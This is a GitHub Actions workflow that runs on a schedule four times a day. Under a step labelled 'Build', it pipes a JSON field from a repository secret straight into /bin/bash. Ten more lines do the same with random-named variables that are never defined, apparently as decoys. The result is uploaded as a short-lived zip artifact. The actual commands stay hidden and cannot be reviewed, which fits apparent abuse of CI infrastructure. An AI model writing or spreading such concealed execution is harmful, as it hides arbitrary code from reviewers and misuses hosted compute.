name: Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '17 1,7,13,19 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  operation:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Build
        env:
          ul3127: ${{ secrets.ul3127 }}
        run: |
          printf '%s' "$ul3127" | jq -r .thcnq247 | /bin/bash
          echo $jav9052 | jq -r .lu34527 | /bin/bash
          printf '%s' "$zm66" | jq -r .we85 | /bin/bash
          echo $cq16466 | jq -r .qopmt802 | /bin/bash
          echo $k83 | jq -r .in758 | /bin/bash
          printf '%s' "$rqjjv16" | jq -r .r05 | /bin/bash
          printf '%s' "$hyodp4" | jq -r .hne4 | /bin/bash
          echo $tqra9250 | jq -r .nqp9 | /bin/bash
          echo $phds6 | jq -r .ixv42 | /bin/bash
          echo $g0389 | jq -r .kichg57158 | /bin/bash
          echo $yqkak45 | jq -r .v0811 | /bin/bash

      - name: Archive output
        uses: actions/upload-artifact@v4
        with:
          name: GigWom8p
          path: "*.zip"
          retention-days: 1
